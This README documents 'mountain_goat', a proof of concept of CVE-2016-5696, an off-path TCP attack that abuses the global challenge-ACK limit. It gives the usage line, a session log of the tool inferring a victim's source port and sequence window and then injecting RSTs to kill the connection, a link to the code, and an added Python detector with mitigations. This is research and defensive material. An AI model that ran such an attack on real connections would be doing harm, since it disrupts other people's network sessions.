Mountain Goat - Global Rate Limit TCP Off-Path Attack

Hi, I’m a mountain goat and I’m going to ram your TCP connections, because that’s a pretty goat thing to do.

This is a PoC demonstrating the techniques of CVE-2016-5696 from the paper "Off-Path TCP Exploits: Global Rate Limit Considered Dangerous" by Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, Srikanth V. Krishnamurthy and Lisa M. Marvel, presented at the 25th USENIX Security Symposium.

./mountain_goat <attacker_ip> <attacker_port> <victim_ip> <server_ip> <server_port>
[ENTERING] state_synchronize
200 probes dispatch in 0.98858 seconds
200 probes dispatch in 0.98115 seconds
200 probes dispatch in 0.98622 seconds
[ENTERING] state_source_port_inference
10001 syn+ack probes in 0.84733 seconds
5001 syn+ack probes in 0.42722 seconds
2501 syn+ack probes in 0.20866 seconds
1251 syn+ack probes in 0.10266 seconds
625 syn+ack probes in 0.04356 seconds
313 syn+ack probes in 0.02778 seconds
156 syn+ack probes in 0.01398 seconds
78 syn+ack probes in 0.00697 seconds
39 syn+ack probes in 0.00269 seconds
20 syn+ack probes in 0.00181 seconds
10 syn+ack probes in 0.00079 seconds
5 syn+ack probes in 0.00050 seconds
3 syn+ack probes in 0.00026 seconds
2 syn+ack probes in 0.00021 seconds
1 syn+ack probes in 0.00011 seconds
Source Port interference determined: 41154
[ENTERING] state_sequence_chunk_inference
Probing Sequence Chunk 0 - 144800000
Probing Sequence Chunk 144800000 - 289600000
Probing Sequence Chunk 289600000 - 434400000
Probing Sequence Chunk 434400000 - 579200000
Probing Sequence Chunk 579200000 - 724000000
Probing Sequence Chunk 724000000 - 868800000
Probing Sequence Chunk 868800000 - 1013600000
Probing Sequence Chunk 1013600000 - 1158400000
Probing Sequence Chunk 1158400000 - 1303200000
Probing Sequence Chunk 1303200000 - 1448000000
Probing Sequence Chunk 1448000000 - 1592800000
Probing Sequence Chunk 1592800000 - 1737600000
[!] Sidechannel socket lost, reconnecting.
Probing Sequence Chunk 1592800000 - 1737600000
Probing Sequence Chunk 1737600000 - 1882400000
Probing Sequence Chunk 1882400000 - 2027200000
Probing Sequence Chunk 2027200000 - 2172000000
Probing Sequence Chunk 2172000000 - 2316800000
Probing Sequence Chunk 2316800000 - 2461600000
Probing Sequence Chunk 2461600000 - 2606400000
Sequence is in Chunk 2461600000 - 2606400000
Adjusted step from 14480 to 43440
[ENTERING] state_sequence_bin_search
Sequence in targets window: 2533710400
[ENTERING] state_having_a_blast
Blasting RSTs: 2533695920 - 2533710400
Connection terminated, baaaah

This is not a complete implementation of the traffic injection attack. It is merely an implementation up to the inference of the current client's sequence number window. Due to the timing-dependent nature of the side channel, it may need additional tuning depending on the host to function properly.
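
The side channel only works if the attacker can drive the kernel's shared challenge-ACK counter to its per-second limit (100 in affected kernels), and the session log above shows what that looks like on the wire: about 200 probes per second during synchronization and thousands of SYN+ACK probes per second during port inference. The following detector, an added example that is not part of mountain_goat, counts RST and SYN+ACK packets per source address in sliding one-second windows and flags any source that alone reaches the limit. The log line format and the sample traffic are constructed for the example; the limit constant is the default net.ipv4.tcp_challenge_ack_limit of affected kernels.

```python
"""Detect per-source probe bursts large enough to exhaust the global
challenge-ACK rate limit exploited by CVE-2016-5696.

Added example, not code from the mountain_goat PoC. The log line format
("<ts> <src> > <dst>:<dport> flags=<F>") and the sample traffic below are
constructed for this example.
"""
from collections import defaultdict
from dataclasses import dataclass

# Default net.ipv4.tcp_challenge_ack_limit in kernels affected by CVE-2016-5696.
CHALLENGE_ACK_LIMIT = 100


@dataclass
class Packet:
    ts: float
    src: str
    dst: str
    dport: int
    flags: str  # "S", "SA", "A", "R", "RA", ...


def parse_line(line: str) -> Packet:
    """Parse one constructed-format log line into a Packet."""
    ts, src, _, dst_port, flag_field = line.split()
    dst, dport = dst_port.rsplit(":", 1)
    return Packet(float(ts), src, dst, int(dport), flag_field.split("=", 1)[1])


def probe_like(pkt: Packet) -> bool:
    """RST and SYN+ACK segments are the probe types seen in the PoC log."""
    return pkt.flags in ("R", "RA", "SA")


def find_bursts(packets, limit=CHALLENGE_ACK_LIMIT, window=1.0):
    """Return {src: peak probe count} for every source whose probe-like
    packets reach `limit` within any sliding window of `window` seconds."""
    times_by_src = defaultdict(list)
    for pkt in packets:
        if probe_like(pkt):
            times_by_src[pkt.src].append(pkt.ts)

    alerts = {}
    for src, times in times_by_src.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # Slide the window start forward until it spans less than `window` s.
            while t - times[start] >= window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= limit:
            alerts[src] = peak
    return alerts


def sample_lines():
    """Constructed traffic: one burst that exhausts the limit, two benign sources."""
    lines = []
    # 150 RSTs in 0.75 s from a single source (the synchronization-phase pattern).
    for i in range(150):
        lines.append(f"{1000.0 + i * 0.005:.3f} 203.0.113.5 > 192.0.2.10:22 flags=R")
    # 20 RSTs spread over ~5 s: never more than 4 in any one-second window.
    for i in range(20):
        lines.append(f"{1000.0 + i * 0.25:.3f} 198.51.100.9 > 192.0.2.10:22 flags=R")
    # Ordinary handshake SYNs are not probe-like and are ignored.
    for i in range(5):
        lines.append(f"{1000.0 + i:.3f} 198.51.100.7 > 192.0.2.10:22 flags=S")
    return lines


def detect(lines=None):
    """Run the detector over the given lines (defaults to the constructed sample)."""
    lines = sample_lines() if lines is None else lines
    return find_bursts(parse_line(line) for line in lines)


if __name__ == "__main__":
    for src, peak in detect().items():
        print(f"ALERT {src}: {peak} probe-like packets within one second "
              f"(limit {CHALLENGE_ACK_LIMIT})")
```

Only the first source is reported (150 RSTs within one second); the second never exceeds four per window and the SYN-only source is skipped. On the host side, the interim mitigation for pre-4.7 kernels was to raise net.ipv4.tcp_challenge_ack_limit far above any feasible probe rate, and Linux 4.7 made the limit randomized; a detector like this is a complement to that, not a substitute.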

The code can be found here: https://github.com/Gnoxter/mountain_goat